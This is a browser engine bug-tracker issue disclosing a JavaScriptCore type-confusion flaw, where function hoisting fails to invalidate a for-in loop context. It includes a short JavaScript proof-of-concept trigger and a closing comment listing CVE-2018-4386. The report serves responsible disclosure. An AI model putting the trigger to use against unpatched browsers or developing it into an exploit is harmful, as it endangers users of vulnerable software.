New issue
Advanced search Search tips
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Nov 29
Cc:



Sign in to add a comment
link

Issue 1665: WebKit: JSC: BytecodeGenerator::hoistSloppyModeFunctionIfNecessary doesn't invalidate the ForInContext object.

Reported by lokihardt@google.com, Sep 13 Project Member

Issue description

This is simillar to  issue 1263 . When hoisting a function onto the outer scope, if it overwrites the iteration variable for a for-in loop it should invalidate the corresponding ForInContext object, but it doesn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler which uses the property variable directly as a string object without any check.

PoC:
function trigger() {
    let o = {a: 1};
    for (var k in o) {
        {
            k = 0x1234;

            function k() {

            }
        }

        o[k];
    }
}

trigger();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
 

Comment 2 by lokihardt@google.com, Nov 29

Project Member
Labels: -Restrict-View-Commit CVE-2018-4386
Status: Fixed (was: New)

Sign in to add a comment